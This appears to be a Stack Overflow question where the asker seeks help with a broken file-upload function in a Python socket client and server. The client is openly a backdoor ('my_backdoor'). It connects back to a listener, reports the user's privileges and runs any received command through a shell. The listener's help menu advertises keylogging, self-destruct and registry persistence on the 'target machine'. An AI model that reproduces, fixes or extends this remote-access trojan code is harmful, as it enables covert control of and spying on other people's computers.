# sockets cant upload file

Tags: python, windows, sockets

I am tryin to develop a script that works on the client machine sending information to the server and uploading&downloading to/from client machine. However, when I try to upload a file, I see in my server machine that the file is sending the file but the client doesn't receive and shows no error. uploading code worked properly before I implemented into my main code. Sorry if there is misunderstanding in my explanation i am new at stackoverflow.
every help is welcome X

```
import socket
from socket import *
import subprocess
import json
import os
import tqdm

path = 'C:\\Users\HP PC\Desktop'
SEPARATOR = "<SEPARATOR>"
BUFFER_SIZE = 4096


class Client:
    def __init__(self, ip, port):

        self.connection = socket(AF_INET, SOCK_STREAM)
        self.connection.connect((ip, port))

    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data.encode())

    def reliable_recv(self):
        json_data = " "
        while True:
            try:
                json_data = json_data + self.connection.recv(4096).decode('ISO-8859-1').strip()
                return json.loads(json_data)
            except ValueError:
                continue

    def change_working_directory_to(self, path):
        os.chdir(path)
        return "[+] Changing working directory to " + path

    def down(self):
        try:
            received = self.connection.recv(BUFFER_SIZE).decode()
            filename, filesize = received.split(SEPARATOR)
            filename = os.path.basename(filename)
            filesize = int(filesize)

            progress = tqdm.tqdm(range(filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024)
            with open(filename, "wb") as f:
                while True:
                    bytes_read = self.connection.recv(BUFFER_SIZE)
                    if not bytes_read:
                        break
                    f.write(bytes_read)
                    progress.update(len(bytes_read))
        except Exception as e:
            print(e)


    def run(self):
        privilege = subprocess.check_output('whoami', shell=True)
        self.connection.send(privilege)
        while True:
            command = self.reliable_recv()
            if command[0] == "quit":
                self.connection.close()
                exit()
            elif command[0] == "/help":
                continue
            elif command[0] == '/cls':
                continue

            elif command[0] == 'upload':
                self.down()
                continue

            # elif command[:3] == "cd ":
            #     try:
            #         os.chdir(path)
            #     except OSError as e:
            #         print(e)

            else:
                command_result = self.execute_system_command(command)
                self.reliable_send(command_result.decode("ISO-8859-1").strip())


my_backdoor = Client('192.168.8.105', 6543)
my_backdoor.run()
```

Here is the server code:

```
import json
import os
import socket
import tqdm

SEPARATOR = "<SEPARATOR>"
BUFFER_SIZE = 4096
class Listener:
    def __init__(self, bind_ip, bind_port):
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((bind_ip, bind_port))
        server.listen(0)
        print("[*] Listening on ", str(bind_ip))
        self.connection, addr = server.accept()
        print("[*] Accepted connection from: %s:%d" % (addr[0], addr[1]))
        receive = self.connection.recv(1024)
        print("[+] This is " + receive.decode('ISO-8859-1'))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data.encode().strip())

    def reliable_recv(self):
        json_data = " "
        while True:
            try:
                json_data = json_data + self.connection.recv(4096).decode('ISO-8859-1')
                return json.loads(json_data)
            except ValueError:
                continue

    def upload(self):
        filename = "v.png"
        filesize = os.path.getsize(filename)
        # send the filename and filesize
        self.connection.send(f"{filename}{SEPARATOR}{filesize}".encode())

        # start sending the file
        progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024)
        with open(filename, "rb") as f:
            while True:
                # read the bytes from the file
                bytes_read = f.read(BUFFER_SIZE)
                if not bytes_read:
                    # file transmitting is done
                    break
                # we use sendall to assure transimission in
                # busy networks
                self.connection.sendall(bytes_read)
                # update the progress bar
                progress.update(len(bytes_read))



    def run_command(self):
        while True:
            command = input(">")
            command = command.split(" ")
            if command[0] == "quit":
                self.connection.close()
                exit()

            elif command[0] == "/help":
               print('''
               quit                                 => Quit the sessison
               clear                                => Clear the screen
               cd *dirname                          => Change directory on target machine
               upload *filename                     =>Upload file to target machine
               download *filename                   =>Download file from target machine
               key_start                            =>Start the keylogger
               key_dump                             =>Print the keystrokes target prompted
               key_stop                             =>Stop and self destruct keylogger file
               persistance *RegName* *filename      =>Persistance in reboot
               ''')
               continue

            elif command[:3] == 'cd ':
                pass

            elif command[0] == 'upload':
                self.upload()
                continue

            elif command[0] == '/cls':
                os.system('cls')
                continue

            self.reliable_send(command)
            result = self.reliable_recv()
            print(result)


my_listener = Listener('192.168.8.105', 6543)
my_listener.run_command()
```

it doesnt show any errors and rest of the code is working properly.
Upload and download functions worked properly when I tried to test
but didnt work when i tried to implement into my main code

Comment: Some debugging advice... First, try one thing at a time. Get that working before moving on. Second, display the progress in your program: sprinkle your code with `print(f"Sent: {bytes}")`, `print(f"Recv'd: {bytes}")`, etc. Then you will be able to see where things went south (or got stuck or whatever). Once you find out where it went wrong, it will often be obvious why (or if not, at least you know exactly what to ask about here on stackoverflow). Then, if you do post for help, provide the entire input you gave and output you got along with your [mcve].

Comment: I was not getting any error or output as it is written. I solved the problem by setting socket options. I used tqdm library to see the progress as you can see above in the code anyways thx for your advice.